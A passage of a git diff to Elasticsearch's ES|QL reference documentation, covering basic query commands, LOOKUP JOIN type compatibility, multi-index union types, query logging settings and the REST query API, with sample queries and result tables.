[esql-getting-started-limit] + +A source command can be followed by one or more [processing commands](commands/processing-commands.md), separated by a pipe character: `|`. Processing commands change an input table by adding, removing, or changing rows and columns. Processing commands can perform filtering, projection, aggregation, and more. + +:::{image} ../images/elasticsearch-reference-esql-limit.png +:alt: A processing command changing an input table +:width: 500px +::: + +For example, you can use the [`LIMIT`](commands/limit.md) command to limit the number of rows that are returned, up to a maximum of 10,000 rows: + +```esql +FROM sample_data +| LIMIT 3 +``` + +::::{tip} +For readability, you can put each command on a separate line. However, you don’t have to. The following query is identical to the previous one: + +```esql +FROM sample_data | LIMIT 3 +``` + +:::: + + + +### Sort a table [esql-getting-started-sort] + +:::{image} ../images/elasticsearch-reference-esql-sort.png +:alt: A processing command sorting an input table +:width: 500px +::: + +Another processing command is the [`SORT`](commands/sort.md) command. By default, the rows returned by `FROM` don’t have a defined sort order. Use the `SORT` command to sort rows on one or more columns: + +```esql +FROM sample_data +| SORT @timestamp DESC +``` + + +### Query the data [esql-getting-started-where] + +Use the [`WHERE`](commands/where.md) command to query the data. For example, to find all events with a duration longer than 5ms: + +```esql +FROM sample_data +| WHERE event_duration > 5000000 +``` + +`WHERE` supports several [operators](functions-operators/operators.md). For example, you can use [`LIKE`](functions-operators/operators.md#esql-like) to run a wildcard query against the `message` column: + +```esql +FROM sample_data +| WHERE message LIKE "Connected*" +``` + + +### More processing commands [esql-getting-started-more-commands] + +There are many other processing commands, like [`KEEP`](commands/keep.md) and [`DROP`](commands/drop.md) to keep or drop columns, [`ENRICH`](commands/enrich.md) to enrich a table with data from indices in {{es}}, and [`DISSECT`](commands/dissect.md) and [`GROK`](commands/grok.md) to process data. Refer to [Processing commands](commands/processing-commands.md) for an overview of all processing commands. + + +## Chain processing commands [esql-getting-started-chaining] + +You can chain processing commands, separated by a pipe character: `|`. Each processing command works on the output table of the previous command. The result of a query is the table produced by the final processing command. + +:::{image} ../images/elasticsearch-reference-esql-sort-limit.png +:alt: Processing commands can be chained +::: + +The following example first sorts the table on `@timestamp`, and next limits the result set to 3 rows: + +```esql +FROM sample_data +| SORT @timestamp DESC +| LIMIT 3 +``` + +::::{note} +The order of processing commands is important. First limiting the result set to 3 rows before sorting those 3 rows would most likely return a result that is different than this example, where the sorting comes before the limit. +:::: + + + +## Compute values [esql-getting-started-eval] + +Use the [`EVAL`](commands/eval.md) command to append columns to a table, with calculated values. For example, the following query appends a `duration_ms` column. The values in the column are computed by dividing `event_duration` by 1,000,000. In other words: `event_duration` converted from nanoseconds to milliseconds. + +```esql +FROM sample_data +| EVAL duration_ms = event_duration/1000000.0 +``` + +`EVAL` supports several [functions](commands/eval.md). For example, to round a number to the closest number with the specified number of digits, use the [`ROUND`](functions-operators/math-functions.md#esql-round) function: + +```esql +FROM sample_data +| EVAL duration_ms = ROUND(event_duration/1000000.0, 1) +``` + + +## Calculate statistics [esql-getting-started-stats] + +{{esql}} can not only be used to query your data, you can also use it to aggregate your data. Use the [`STATS`](commands/stats-by.md) command to calculate statistics. For example, the median duration: + +```esql +FROM sample_data +| STATS median_duration = MEDIAN(event_duration) +``` + +You can calculate multiple stats with one command: + +```esql +FROM sample_data +| STATS median_duration = MEDIAN(event_duration), max_duration = MAX(event_duration) +``` + +Use `BY` to group calculated stats by one or more columns. For example, to calculate the median duration per client IP: + +```esql +FROM sample_data +| STATS median_duration = MEDIAN(event_duration) BY client_ip +``` + + +## Access columns [esql-getting-started-access-columns] + +You can access columns by their name. If a name contains special characters, [it needs to be quoted](esql-syntax.md#esql-identifiers) with backticks (```). + +Assigning an explicit name to a column created by `EVAL` or `STATS` is optional. If you don’t provide a name, the new column name is equal to the function expression. For example: + +```esql +FROM sample_data +| EVAL event_duration/1000000.0 +``` + +In this query, `EVAL` adds a new column named `event_duration/1000000.0`. Because its name contains special characters, to access this column, quote it with backticks: + +```esql +FROM sample_data +| EVAL event_duration/1000000.0 +| STATS MEDIAN(`event_duration/1000000.0`) +``` + + +## Create a histogram [esql-getting-started-histogram] + +To track statistics over time, {{esql}} enables you to create histograms using the [`BUCKET`](functions-operators/grouping-functions.md#esql-bucket) function. `BUCKET` creates human-friendly bucket sizes and returns a value for each row that corresponds to the resulting bucket the row falls into. + +Combine `BUCKET` with [`STATS`](commands/stats-by.md) to create a histogram. For example, to count the number of events per hour: + +```esql +FROM sample_data +| STATS c = COUNT(*) BY bucket = BUCKET(@timestamp, 24, "2023-10-23T00:00:00Z", "2023-10-23T23:59:59Z") +``` + +Or the median duration per hour: + +```esql +FROM sample_data +| KEEP @timestamp, event_duration +| STATS median_duration = MEDIAN(event_duration) BY bucket = BUCKET(@timestamp, 24, "2023-10-23T00:00:00Z", "2023-10-23T23:59:59Z") +``` + + +## Enrich data [esql-getting-started-enrich] + +{{esql}} enables you to [enrich](esql-enrich-data.md) a table with data from indices in {{es}}, using the [`ENRICH`](commands/enrich.md) command. + +:::{image} ../images/elasticsearch-reference-esql-enrich.png +:alt: esql enrich +::: + +Before you can use `ENRICH`, you first need to [create](esql-enrich-data.md#esql-create-enrich-policy) and [execute](esql-enrich-data.md#esql-execute-enrich-policy) an [enrich policy](esql-enrich-data.md#esql-enrich-policy). + +:::::::{tab-set} + +::::::{tab-item} Own deployment +The following requests create and execute a policy called `clientip_policy`. The policy links an IP address to an environment ("Development", "QA", or "Production"): + +```console +PUT clientips +{ + "mappings": { + "properties": { + "client_ip": { + "type": "keyword" + }, + "env": { + "type": "keyword" + } + } + } +} + +PUT clientips/_bulk +{ "index" : {}} +{ "client_ip": "172.21.0.5", "env": "Development" } +{ "index" : {}} +{ "client_ip": "172.21.2.113", "env": "QA" } +{ "index" : {}} +{ "client_ip": "172.21.2.162", "env": "QA" } +{ "index" : {}} +{ "client_ip": "172.21.3.15", "env": "Production" } +{ "index" : {}} +{ "client_ip": "172.21.3.16", "env": "Production" } + +PUT /_enrich/policy/clientip_policy +{ + "match": { + "indices": "clientips", + "match_field": "client_ip", + "enrich_fields": ["env"] + } +} + +PUT /_enrich/policy/clientip_policy/_execute?wait_for_completion=false +``` +:::::: + +::::::{tab-item} Demo environment +On the demo environment at [ela.st/ql](https://ela.st/ql/), an enrich policy called `clientip_policy` has already been created an executed. The policy links an IP address to an environment ("Development", "QA", or "Production"). +:::::: + +::::::: +After creating and executing a policy, you can use it with the `ENRICH` command: + +```esql +FROM sample_data +| KEEP @timestamp, client_ip, event_duration +| EVAL client_ip = TO_STRING(client_ip) +| ENRICH clientip_policy ON client_ip WITH env +``` + +You can use the new `env` column that’s added by the `ENRICH` command in subsequent commands. For example, to calculate the median duration per environment: + +```esql +FROM sample_data +| KEEP @timestamp, client_ip, event_duration +| EVAL client_ip = TO_STRING(client_ip) +| ENRICH clientip_policy ON client_ip WITH env +| STATS median_duration = MEDIAN(event_duration) BY env +``` + +For more about data enrichment with {{esql}}, refer to [Data enrichment](esql-enrich-data.md). + + +## Process data [esql-getting-started-process-data] + +Your data may contain unstructured strings that you want to [structure](esql-process-data-with-dissect-grok.md) to make it easier to analyze the data. For example, the sample data contains log messages like: + +```txt +"Connected to 10.1.0.3" +``` + +By extracting the IP address from these messages, you can determine which IP has accepted the most client connections. + +To structure unstructured strings at query time, you can use the {{esql}} [`DISSECT`](commands/dissect.md) and [`GROK`](commands/grok.md) commands. `DISSECT` works by breaking up a string using a delimiter-based pattern. `GROK` works similarly, but uses regular expressions. This makes `GROK` more powerful, but generally also slower. + +In this case, no regular expressions are needed, as the `message` is straightforward: "Connected to ", followed by the server IP. To match this string, you can use the following `DISSECT` command: + +```esql +FROM sample_data +| DISSECT message "Connected to %{server_ip}" +``` + +This adds a `server_ip` column to those rows that have a `message` that matches this pattern. For other rows, the value of `server_ip` is `null`. + +You can use the new `server_ip` column that’s added by the `DISSECT` command in subsequent commands. For example, to determine how many connections each server has accepted: + +```esql +FROM sample_data +| WHERE STARTS_WITH(message, "Connected to") +| DISSECT message "Connected to %{server_ip}" +| STATS COUNT(*) BY server_ip +``` + +For more about data processing with {{esql}}, refer to [Data processing with DISSECT and GROK](esql-process-data-with-dissect-grok.md). + + +## Learn more [esql-getting-learn-more] + +- Explore the zero-setup, live [{{esql}} demo environment](http://esql.demo.elastic.co/). +- +- Follow along with our hands-on tutorials: + - [Search and filter with {{esql}}](/reference/query-languages/esql/esql-search-tutorial.md): A hands-on tutorial that shows you how to use {{esql}} to search and filter data. + - [Threat hunting with {{esql}}](docs-content://solutions/security/esql-for-security/esql-threat-hunting-tutorial.md): A hands-on tutorial that shows you how to use {{esql}} for advanced threat hunting techniques and security analysis. \ No newline at end of file diff --git a/docs/reference/query-languages/esql/esql-lookup-join.md b/docs/reference/query-languages/esql/esql-lookup-join.md index d57437833c1b2..ce85bbedc12fa 100644 --- a/docs/reference/query-languages/esql/esql-lookup-join.md +++ b/docs/reference/query-languages/esql/esql-lookup-join.md @@ -6,7 +6,7 @@ mapped_pages: # Join data from multiple indices with `LOOKUP JOIN` [esql-lookup-join-reference] -The {{esql}} [`LOOKUP JOIN`](/reference/query-languages/esql/commands/processing-commands.md#esql-lookup-join) processing command combines data from your {{esql}} query results table with matching records from a specified lookup index. It adds fields from the lookup index as new columns to your results table based on matching values in the join field. +The {{esql}} [`LOOKUP JOIN`](/reference/query-languages/esql/commands/lookup-join.md) processing command combines data from your {{esql}} query results table with matching records from a specified lookup index. It adds fields from the lookup index as new columns to your results table based on matching values in the join field. Teams often have data scattered across multiple indices – like logs, IPs, user IDs, hosts, employees etc. Without a direct way to enrich or correlate each event with reference data, root-cause analysis, security checks, and operational insights become time-consuming. @@ -18,7 +18,7 @@ For example, you can use `LOOKUP JOIN` to: ## Compare with `ENRICH` -[`LOOKUP JOIN`](/reference/query-languages/esql/commands/processing-commands.md#esql-lookup-join) is similar to [`ENRICH`](/reference/query-languages/esql/commands/processing-commands.md#esql-enrich) in the fact that they both help you join data together. You should use `LOOKUP JOIN` when: +[`LOOKUP JOIN`](/reference/query-languages/esql/commands/lookup-join.md) is similar to [`ENRICH`](/reference/query-languages/esql/commands/enrich.md) in the fact that they both help you join data together. You should use `LOOKUP JOIN` when: * Your enrichment data changes frequently * You want to avoid index-time processing @@ -138,23 +138,42 @@ A successful query will output a table. In this example, you can see that the `s ### Additional examples -Refer to the examples section of the [`LOOKUP JOIN`](/reference/query-languages/esql/commands/processing-commands.md#esql-lookup-join) command reference for more examples. +Refer to the examples section of the [`LOOKUP JOIN`](/reference/query-languages/esql/commands/lookup-join.md) command reference for more examples. ## Prerequisites [esql-lookup-join-prereqs] -To use `LOOKUP JOIN`, the following requirements must be met: +### Index configuration -* Indices used for lookups must be configured with the [`lookup` index mode](/reference/elasticsearch/index-settings/index-modules.md#index-mode-setting) -* **Compatible data types**: The join key and join field in the lookup index must have compatible data types. This means: - * The data types must either be identical or be internally represented as the same type in {{esql}} - * Numeric types follow these compatibility rules: - * `short` and `byte` are compatible with `integer` (all represented as `int`) - * `float`, `half_float`, and `scaled_float` are compatible with `double` (all represented as `double`) - * For text fields: You can only use text fields as the join key on the left-hand side of the join and only if they have a `.keyword` subfield +Indices used for lookups must be configured with the [`lookup` index mode](/reference/elasticsearch/index-settings/index-modules.md#index-mode-setting). +### Data type compatibility + +Join keys must have compatible data types between the source and lookup indices. Types within the same compatibility group can be joined together: + +| Compatibility group | Types | Notes | +|------------------------|-------------------------------------------------------------------------------------|----------------------------------------------------------------------------------| +| **Numeric family** | `byte`, `short`, `integer`, `long`, `half_float`, `float`, `scaled_float`, `double` | All compatible | +| **Keyword family** | `keyword`, `text.keyword` | Text fields only as join key on left-hand side and must have `.keyword` subfield | +| **Date (Exact)** | `date` | Must match exactly | +| **Date Nanos (Exact)** | `date_nanos` | Must match exactly | +| **Boolean** | `boolean` | Must match exactly | + +```{tip} To obtain a join key with a compatible type, use a [conversion function](/reference/query-languages/esql/functions-operators/type-conversion-functions.md) if needed. +``` -For a complete list of supported data types and their internal representations, see the [Supported Field Types documentation](/reference/query-languages/esql/limitations.md#_supported_types). +### Unsupported Types + +In addition to the [{{esql}} unsupported field types](/reference/query-languages/esql/limitations.md#_unsupported_types), `LOOKUP JOIN` does not support: + +* `VERSION` +* `UNSIGNED_LONG` +* Spatial types like `GEO_POINT`, `GEO_SHAPE` +* Temporal intervals like `DURATION`, `PERIOD` + +```{note} +For a complete list of all types supported in `LOOKUP JOIN`, refer to the [`LOOKUP JOIN` supported types table](/reference/query-languages/esql/commands/lookup-join.md). +``` ## Usage notes @@ -181,6 +200,7 @@ The following are the current limitations with `LOOKUP JOIN`: * Indices in [`lookup` mode](/reference/elasticsearch/index-settings/index-modules.md#index-mode-setting) are always single-sharded. * Cross cluster search is unsupported initially. Both source and lookup indices must be local. * Currently, only matching on equality is supported. -* `LOOKUP JOIN` can only use a single match field and a single index. Wildcards, aliases, datemath, and datastreams are not supported. +* `LOOKUP JOIN` can only use a single match field and a single index. Wildcards are not supported. + * Aliases, datemath, and datastreams are supported, as long as the index pattern matches a single concrete index {applies_to}`stack: ga 9.1.0`. * The name of the match field in `LOOKUP JOIN lu_idx ON match_field` must match an existing field in the query. This may require `RENAME`s or `EVAL`s to achieve. * The query will circuit break if there are too many matching documents in the lookup index, or if the documents are too large. More precisely, `LOOKUP JOIN` works in batches of, normally, about 10,000 rows; a large amount of heap space is needed if the matching documents from the lookup index for a batch are multiple megabytes or larger. This is roughly the same as for `ENRICH`. diff --git a/docs/reference/query-languages/esql/esql-metadata-fields.md b/docs/reference/query-languages/esql/esql-metadata-fields.md index 0dd5f5db941f6..b75b35680ce93 100644 --- a/docs/reference/query-languages/esql/esql-metadata-fields.md +++ b/docs/reference/query-languages/esql/esql-metadata-fields.md @@ -8,7 +8,7 @@ mapped_pages: {{esql}} can access [metadata fields](/reference/elasticsearch/mapping-reference/document-metadata-fields.md). -To access these fields, use the `METADATA` directive with the [`FROM`](/reference/query-languages/esql/commands/source-commands.md#esql-from) source command. For example: +To access these fields, use the `METADATA` directive with the [`FROM`](/reference/query-languages/esql/commands/from.md) source command. For example: ```esql FROM index METADATA _index, _id diff --git a/docs/reference/query-languages/esql/esql-multi-index.md b/docs/reference/query-languages/esql/esql-multi-index.md new file mode 100644 index 0000000000000..b35996329ed05 --- /dev/null +++ b/docs/reference/query-languages/esql/esql-multi-index.md @@ -0,0 +1,159 @@ +--- +navigation_title: Query multiple indices +mapped_pages: + - https://www.elastic.co/guide/en/elasticsearch/reference/current/esql-multi-index.html +applies_to: + stack: ga + serverless: ga +products: + - id: elasticsearch +--- + +# Use ES|QL to query multiple indices [esql-multi-index] + +With {{esql}}, you can execute a single query across multiple indices, data streams, or aliases. To do so, use wildcards and date arithmetic. The following example uses a comma-separated list and a wildcard: + +```esql +FROM employees-00001,other-employees-* +``` + +Use the format `:` to [query data streams and indices on remote clusters](esql-cross-clusters.md): + +```esql +FROM cluster_one:employees-00001,cluster_two:other-employees-* +``` + + +## Field type mismatches [esql-multi-index-invalid-mapping] + +When querying multiple indices, data streams, or aliases, you might find that the same field is mapped to multiple different types. For example, consider the two indices with the following field mappings: + +**index: events_ip** + +``` +{ + "mappings": { + "properties": { + "@timestamp": { "type": "date" }, + "client_ip": { "type": "ip" }, + "event_duration": { "type": "long" }, + "message": { "type": "keyword" } + } + } +} +``` + +**index: events_keyword** + +``` +{ + "mappings": { + "properties": { + "@timestamp": { "type": "date" }, + "client_ip": { "type": "keyword" }, + "event_duration": { "type": "long" }, + "message": { "type": "keyword" } + } + } +} +``` + +When you query each of these individually with a simple query like `FROM events_ip`, the results are provided with type-specific columns: + +```esql +FROM events_ip +| SORT @timestamp DESC +``` + +| @timestamp:date | client_ip:ip | event_duration:long | message:keyword | +| --- | --- | --- | --- | +| 2023-10-23T13:55:01.543Z | 172.21.3.15 | 1756467 | Connected to 10.1.0.1 | +| 2023-10-23T13:53:55.832Z | 172.21.3.15 | 5033755 | Connection error | +| 2023-10-23T13:52:55.015Z | 172.21.3.15 | 8268153 | Connection error | + +Note how the `client_ip` column is correctly identified as type `ip`, and all values are displayed. However, if instead the query sources two conflicting indices with `FROM events_*`, the type of the `client_ip` column cannot be determined and is reported as `unsupported` with all values returned as `null`. + +$$$query-unsupported$$$ + +```esql +FROM events_* +| SORT @timestamp DESC +``` + +| @timestamp:date | client_ip:unsupported | event_duration:long | message:keyword | +| --- | --- | --- | --- | +| 2023-10-23T13:55:01.543Z | null | 1756467 | Connected to 10.1.0.1 | +| 2023-10-23T13:53:55.832Z | null | 5033755 | Connection error | +| 2023-10-23T13:52:55.015Z | null | 8268153 | Connection error | +| 2023-10-23T13:51:54.732Z | null | 725448 | Connection error | +| 2023-10-23T13:33:34.937Z | null | 1232382 | Disconnected | +| 2023-10-23T12:27:28.948Z | null | 2764889 | Connected to 10.1.0.2 | +| 2023-10-23T12:15:03.360Z | null | 3450233 | Connected to 10.1.0.3 | + +In addition, if the query refers to this unsupported field directly, the query fails: + +```esql +FROM events_* +| SORT client_ip DESC +``` + +```bash +Cannot use field [client_ip] due to ambiguities being mapped as +[2] incompatible types: + [ip] in [events_ip], + [keyword] in [events_keyword] +``` + + +## Union types [esql-multi-index-union-types] + +::::{warning} +This functionality is in technical preview and may be changed or removed in a future release. Elastic will work to fix any issues, but features in technical preview are not subject to the support SLA of official GA features. +:::: + + +{{esql}} has a way to handle [field type mismatches](#esql-multi-index-invalid-mapping). When the same field is mapped to multiple types in multiple indices, the type of the field is understood to be a *union* of the various types in the index mappings. As seen in the preceding examples, this *union type* cannot be used in the results, and cannot be referred to by the query — except in `KEEP`, `DROP` or when it’s passed to a type conversion function that accepts all the types in the *union* and converts the field to a single type. {{esql}} offers a suite of [type conversion functions](functions-operators/type-conversion-functions.md) to achieve this. + +In the above examples, the query can use a command like `EVAL client_ip = TO_IP(client_ip)` to resolve the union of `ip` and `keyword` to just `ip`. You can also use the type-conversion syntax `EVAL client_ip = client_ip::IP`. Alternatively, the query could use [`TO_STRING`](functions-operators/type-conversion-functions.md#esql-to_string) to convert all supported types into `KEYWORD`. + +For example, the [query](#query-unsupported) that returned `client_ip:unsupported` with `null` values can be improved using the `TO_IP` function or the equivalent `field::ip` syntax. These changes also resolve the error message. As long as the only reference to the original field is to pass it to a conversion function that resolves the type ambiguity, no error results. + +```esql +FROM events_* +| EVAL client_ip = TO_IP(client_ip) +| KEEP @timestamp, client_ip, event_duration, message +| SORT @timestamp DESC +``` + +| @timestamp:date | client_ip:ip | event_duration:long | message:keyword | +| --- | --- | --- | --- | +| 2023-10-23T13:55:01.543Z | 172.21.3.15 | 1756467 | Connected to 10.1.0.1 | +| 2023-10-23T13:53:55.832Z | 172.21.3.15 | 5033755 | Connection error | +| 2023-10-23T13:52:55.015Z | 172.21.3.15 | 8268153 | Connection error | +| 2023-10-23T13:51:54.732Z | 172.21.3.15 | 725448 | Connection error | +| 2023-10-23T13:33:34.937Z | 172.21.0.5 | 1232382 | Disconnected | +| 2023-10-23T12:27:28.948Z | 172.21.2.113 | 2764889 | Connected to 10.1.0.2 | +| 2023-10-23T12:15:03.360Z | 172.21.2.162 | 3450233 | Connected to 10.1.0.3 | + + +## Index metadata [esql-multi-index-index-metadata] + +It can be helpful to know the particular index from which each row is sourced. To get this information, use the [`METADATA`](esql-metadata-fields.md) option on the [`FROM`](commands/from.md) command. + +```esql +FROM events_* METADATA _index +| EVAL client_ip = TO_IP(client_ip) +| KEEP _index, @timestamp, client_ip, event_duration, message +| SORT @timestamp DESC +``` + +| _index:keyword | @timestamp:date | client_ip:ip | event_duration:long | message:keyword | +| --- | --- | --- | --- | --- | +| events_ip | 2023-10-23T13:55:01.543Z | 172.21.3.15 | 1756467 | Connected to 10.1.0.1 | +| events_ip | 2023-10-23T13:53:55.832Z | 172.21.3.15 | 5033755 | Connection error | +| events_ip | 2023-10-23T13:52:55.015Z | 172.21.3.15 | 8268153 | Connection error | +| events_keyword | 2023-10-23T13:51:54.732Z | 172.21.3.15 | 725448 | Connection error | +| events_keyword | 2023-10-23T13:33:34.937Z | 172.21.0.5 | 1232382 | Disconnected | +| events_keyword | 2023-10-23T12:27:28.948Z | 172.21.2.113 | 2764889 | Connected to 10.1.0.2 | +| events_keyword | 2023-10-23T12:15:03.360Z | 172.21.2.162 | 3450233 | Connected to 10.1.0.3 | + diff --git a/docs/reference/query-languages/esql/esql-multi.md b/docs/reference/query-languages/esql/esql-multi.md new file mode 100644 index 0000000000000..c419703ed72d8 --- /dev/null +++ b/docs/reference/query-languages/esql/esql-multi.md @@ -0,0 +1,13 @@ +--- +applies_to: + stack: ga + serverless: ga +navigation_title: Query multiple sources +--- + +# Query multiple indices or clusters with {{esql}} + +{{esql}} allows you to query across multiple indices or clusters. Learn more in the following sections: + +* [Query multiple indices](esql-multi-index.md) +* [Query across clusters](esql-cross-clusters.md) \ No newline at end of file diff --git a/docs/reference/query-languages/esql/esql-process-data-with-dissect-grok.md b/docs/reference/query-languages/esql/esql-process-data-with-dissect-grok.md index ee4edeb7f91e1..178fb3a28a206 100644 --- a/docs/reference/query-languages/esql/esql-process-data-with-dissect-grok.md +++ b/docs/reference/query-languages/esql/esql-process-data-with-dissect-grok.md @@ -13,7 +13,7 @@ Your data may contain unstructured strings that you want to structure. This make :alt: unstructured data ::: -{{es}} can structure your data at index time or query time. At index time, you can use the [Dissect](/reference/enrich-processor/dissect-processor.md) and [Grok](/reference/enrich-processor/grok-processor.md) ingest processors, or the {{ls}} [Dissect](logstash-docs-md://lsr//plugins-filters-dissect.md) and [Grok](logstash-docs-md://lsr//plugins-filters-grok.md) filters. At query time, you can use the {{esql}} [`DISSECT`](/reference/query-languages/esql/commands/processing-commands.md#esql-dissect) and [`GROK`](/reference/query-languages/esql/commands/processing-commands.md#esql-grok) commands. +{{es}} can structure your data at index time or query time. At index time, you can use the [Dissect](/reference/enrich-processor/dissect-processor.md) and [Grok](/reference/enrich-processor/grok-processor.md) ingest processors, or the {{ls}} [Dissect](logstash-docs-md://lsr//plugins-filters-dissect.md) and [Grok](logstash-docs-md://lsr//plugins-filters-grok.md) filters. At query time, you can use the {{esql}} [`DISSECT`](/reference/query-languages/esql/commands/dissect.md) and [`GROK`](/reference/query-languages/esql/commands/grok.md) commands. ## `DISSECT` or `GROK`? Or both? [esql-grok-or-dissect] @@ -24,7 +24,7 @@ You can use both `DISSECT` and `GROK` for hybrid use cases. For example when a s ## Process data with `DISSECT` [esql-process-data-with-dissect] -The [`DISSECT`](/reference/query-languages/esql/commands/processing-commands.md#esql-dissect) processing command matches a string against a delimiter-based pattern, and extracts the specified keys as columns. +The [`DISSECT`](/reference/query-languages/esql/commands/dissect.md) processing command matches a string against a delimiter-based pattern, and extracts the specified keys as columns. For example, the following pattern: @@ -206,7 +206,7 @@ The `DISSECT` command does not support reference keys. ## Process data with `GROK` [esql-process-data-with-grok] -The [`GROK`](/reference/query-languages/esql/commands/processing-commands.md#esql-grok) processing command matches a string against a pattern based on regular expressions, and extracts the specified keys as columns. +The [`GROK`](/reference/query-languages/esql/commands/grok.md) processing command matches a string against a pattern based on regular expressions, and extracts the specified keys as columns. For example, the following pattern: diff --git a/docs/reference/query-languages/esql/esql-query-log.md b/docs/reference/query-languages/esql/esql-query-log.md new file mode 100644 index 0000000000000..05c7f41134a9c --- /dev/null +++ b/docs/reference/query-languages/esql/esql-query-log.md @@ -0,0 +1,130 @@ +--- +navigation_title: "Query log" +--- + +# {{esql}} Query log [esql-query-log] + + +The {{esql}} query log allows to log {{esql}} queries based on their execution time. + +You can use these logs to investigate, analyze or troubleshoot your cluster’s historical {{esql}} performance. + +{{esql}} query log reports task duration at coordinator level, but might not encompass the full task execution time observed on the client. For example, logs don’t surface HTTP network delays. + +Events that meet the specified threshold are emitted into [{{es}} server logs](docs-content://deploy-manage/monitor/logging-configuration/update-elasticsearch-logging-levels.md). + +These logs can be found in local {{es}} service logs directory. Slow log files have a suffix of `_esql_querylog.json`. + +## Query log format [query-log-format] + +The following is an example of a successful query event in the query log: + +```js +{ + "@timestamp": "2025-03-11T08:39:50.076Z", + "log.level": "TRACE", + "auth.type": "REALM", + "elasticsearch.querylog.planning.took": 3108666, + "elasticsearch.querylog.planning.took_millis": 3, + "elasticsearch.querylog.query": "from index | limit 100", + "elasticsearch.querylog.search_type": "ESQL", + "elasticsearch.querylog.success": true, + "elasticsearch.querylog.took": 8050416, + "elasticsearch.querylog.took_millis": 8, + "user.name": "elastic-admin", + "user.realm": "default_file", + "ecs.version": "1.2.0", + "service.name": "ES_ECS", + "event.dataset": "elasticsearch.esql_querylog", + "process.thread.name": "elasticsearch[runTask-0][esql_worker][T#12]", + "log.logger": "esql.querylog.query", + "elasticsearch.cluster.uuid": "KZo1V7TcQM-O6fnqMm1t_g", + "elasticsearch.node.id": "uPgRE2TrSfa9IvnUpNT1Uw", + "elasticsearch.node.name": "runTask-0", + "elasticsearch.cluster.name": "runTask" +} +``` + +The following is an example of a failing query event in the query log: + +```js +{ + "@timestamp": "2025-03-11T08:41:54.172Z", + "log.level": "TRACE", + "auth.type": "REALM", + "elasticsearch.querylog.error.message": "line 1:15: mismatched input 'limitxyz' expecting {DEV_CHANGE_POINT, 'enrich', 'dissect', 'eval', 'grok', 'limit', 'sort', 'stats', 'where', DEV_INLINESTATS, DEV_FORK, 'lookup', DEV_JOIN_LEFT, DEV_JOIN_RIGHT, DEV_LOOKUP, 'mv_expand', 'drop', 'keep', DEV_INSIST, 'rename'}", + "elasticsearch.querylog.error.type": "org.elasticsearch.xpack.esql.parser.ParsingException", + "elasticsearch.querylog.query": "from person | limitxyz 100", + "elasticsearch.querylog.search_type": "ESQL", + "elasticsearch.querylog.success": false, + "elasticsearch.querylog.took": 963750, + "elasticsearch.querylog.took_millis": 0, + "user.name": "elastic-admin", + "user.realm": "default_file", + "ecs.version": "1.2.0", + "service.name": "ES_ECS", + "event.dataset": "elasticsearch.esql_querylog", + "process.thread.name": "elasticsearch[runTask-0][search][T#16]", + "log.logger": "esql.querylog.query", + "elasticsearch.cluster.uuid": "KZo1V7TcQM-O6fnqMm1t_g", + "elasticsearch.node.id": "uPgRE2TrSfa9IvnUpNT1Uw", + "elasticsearch.node.name": "runTask-0", + "elasticsearch.cluster.name": "runTask" +} +``` + + +## Enable query logging [enable-query-log] + +You can enable query logging at cluster level. + +By default, all thresholds are set to `-1`, which results in no events being logged. + +Query log thresholds can be enabled for the four logging levels: `trace`, `debug`, `info`, and `warn`. + +To view the current query log settings, use the [get cluster settings API](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-cluster-get-settings): + +```console +GET _cluster/settings?filter_path=*.esql.querylog.* +``` + +You can use the `esql.querylog.include.user` setting to append `user.*` and `auth.type` fields to slow log entries. These fields contain information about the user who triggered the request. + +The following snippet adjusts all available {{esql}} query log settings [update cluster settings API](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-cluster-put-settings): + +```console +PUT /_cluster/settings +{ + "transient": { + "esql.querylog.threshold.warn": "10s", + "esql.querylog.threshold.info": "5s", + "esql.querylog.threshold.debug": "2s", + "esql.querylog.threshold.trace": "500ms", + "esql.querylog.include.user": true + } +} +``` + + + +## Best practices for query logging [troubleshoot-query-log] + +Logging slow requests can be resource intensive to your {{es}} cluster depending on the qualifying traffic’s volume. For example, emitted logs might increase the index disk usage of your [{{es}} monitoring](docs-content://deploy-manage/monitor/stack-monitoring.md) cluster. To reduce the impact of slow logs, consider the following: + +* Set high thresholds to reduce the number of logged events. +* Enable slow logs only when troubleshooting. + +If you aren’t sure how to start investigating traffic issues, consider enabling the `warn` threshold with a high `30s` threshold at the index level using the [update cluster settings API](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-cluster-put-settings): + +Here is an example of how to change cluster settings to enable query logging at `warn` level, for queries taking more than 30 seconds, and include user information in the logs: + +```console +PUT /_cluster/settings +{ + "transient": { + "esql.querylog.include.user": true, + "esql.querylog.threshold.warn": "30s" + } +} +``` + diff --git a/docs/reference/query-languages/esql/esql-rest.md b/docs/reference/query-languages/esql/esql-rest.md new file mode 100644 index 0000000000000..ac1c5deab722d --- /dev/null +++ b/docs/reference/query-languages/esql/esql-rest.md @@ -0,0 +1,353 @@ +--- +navigation_title: "REST API" +mapped_pages: + - https://www.elastic.co/guide/en/elasticsearch/reference/current/esql-rest.html +applies_to: + stack: ga + serverless: ga +products: + - id: elasticsearch +--- + +# Use the {{esql}} REST API [esql-rest] + +::::{tip} +The [Search and filter with {{esql}}](/reference/query-languages/esql/esql-search-tutorial.md) tutorial provides a hands-on introduction to the {{esql}} `_query` API. +:::: + +## Overview [esql-rest-overview] + +The [`_query` API](https://www.elastic.co/docs/api/doc/elasticsearch/group/endpoint-esql) accepts an {{esql}} query string in the `query` parameter, runs it, and returns the results. For example: + +```console +POST /_query?format=txt +{ + "query": "FROM library | KEEP author, name, page_count, release_date | SORT page_count DESC | LIMIT 5" +} +``` + +Which returns: + +```text + author | name | page_count | release_date +-----------------+--------------------+---------------+------------------------ +Peter F. Hamilton|Pandora's Star |768 |2004-03-02T00:00:00.000Z +Vernor Vinge |A Fire Upon the Deep|613 |1992-06-01T00:00:00.000Z +Frank Herbert |Dune |604 |1965-06-01T00:00:00.000Z +Alastair Reynolds|Revelation Space |585 |2000-03-15T00:00:00.000Z +James S.A. Corey |Leviathan Wakes |561 |2011-06-02T00:00:00.000Z +``` + + +### Run the {{esql}} query API in Console [esql-kibana-console] + +We recommend using [Console](docs-content://explore-analyze/query-filter/tools/console.md) to run the {{esql}} query API, because of its rich autocomplete features. + +When creating the query, using triple quotes (`"""`) allows you to use special characters like quotes (`"`) without having to escape them. They also make it easier to write multi-line requests. + +```console +POST /_query?format=txt +{ + "query": """ + FROM library + | KEEP author, name, page_count, release_date + | SORT page_count DESC + | LIMIT 5 + """ +} +``` + +### Response formats [esql-rest-format] + +{{esql}} can return the data in the following human 